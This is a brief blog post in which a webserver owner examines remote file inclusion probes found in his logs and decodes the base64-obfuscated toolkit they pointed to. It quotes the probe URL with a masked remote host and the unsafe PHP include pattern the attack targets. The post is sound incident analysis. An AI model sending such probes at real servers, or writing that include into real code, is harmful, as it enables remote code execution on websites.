I was analyzing some logfiles of my webserver during the last days and watched a huge number of strange hits coming from rather strange hosts:

index.php?page=http://www.xxxxxxxx.com/path/to/file.txt

What the heck is going on here? What does the URL do? Well – it’s there for purpose – so let’s fetch it. (URL above is cloaked for security reasons)

A good thing for fetching suspicious stuff is wget or even curl as it just downloads without executing javascript and stuff.

While downloading – the connection was really crappy – let’s examine the url scheme we have seen above. Looks like someone was hoping that I am using includes like that:

<?php include( $_GET['page'] ); ?>

… and that the server is configured for remote includes. Let’s just shake our heads about that and open the file we got. I’m using vi here.

The code I am looking at defies to description. A huge script having embedded sequences of strange character mess. As I know PHP, it was an easy task tracking down those strange code blocks to find out that they are just plain base64 encoded stuff for hiding or even compressing stuff. I just export it to text files for decoding:

cat text1.txt | base64 -d

And here we go – I am able to read the embedded code and my stomach begins to signal discomfiture. One of the code segments is the famous iframe stuff for infecting clients while other ones are helpers for rooting the webhost. Yuck! But what’s that? The last segment looks familiar to me as it opens a socket connection to the russian DAL.Net, an irc network.

To shorten things here, that script is some kind of an evil toolkit for script kiddies – quite outdated except for the embedded exploit code. Awful, but recently used. Anyways – I need some coffee now…